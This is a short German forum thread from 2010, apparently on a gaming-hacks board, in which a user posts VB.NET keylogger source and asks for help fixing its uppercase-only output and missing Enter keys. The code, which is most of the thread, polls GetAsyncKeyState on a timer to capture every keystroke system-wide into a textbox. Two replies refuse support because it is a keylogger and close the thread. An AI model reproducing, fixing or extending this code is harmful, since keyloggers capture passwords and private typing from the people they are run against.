Vb Art Keylogger....

10/07/2010 16:37 Algaten™#1
Kann mir wer Helfen ?
Wenn cih diesen Code benutze dann Schreibt der nur Alles Groß und macht keine Enter.. :(

Code:
Public Class Form1

    Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vkey As Integer) As Integer
    Public Function getkeypress() As Integer
        For i As Integer = 1 To 255
            If GetAsyncKeyState(i) = -32767 Then
                Return i
            End If
        Next i
    End Function



    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        Dim key As Integer = getkeypress()
        If key <> 0 Then
            TextBox1.Text &= CStr(Chr(key))
        End If

    End Sub

    Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
        Timer1.Start()
    End Sub
End Class
10/07/2010 19:28 xmoeglll#2
wenn ich nicht falsch liege wird sowas in epvp nicht supportet, da es ein keylogger eben ist!
10/07/2010 19:36 MrSm!th#3
Quote:
Originally Posted by xmoeglll View Post
wenn ich nicht falsch liege wird sowas in epvp nicht supportet, da es ein keylogger eben ist!
^this

#closed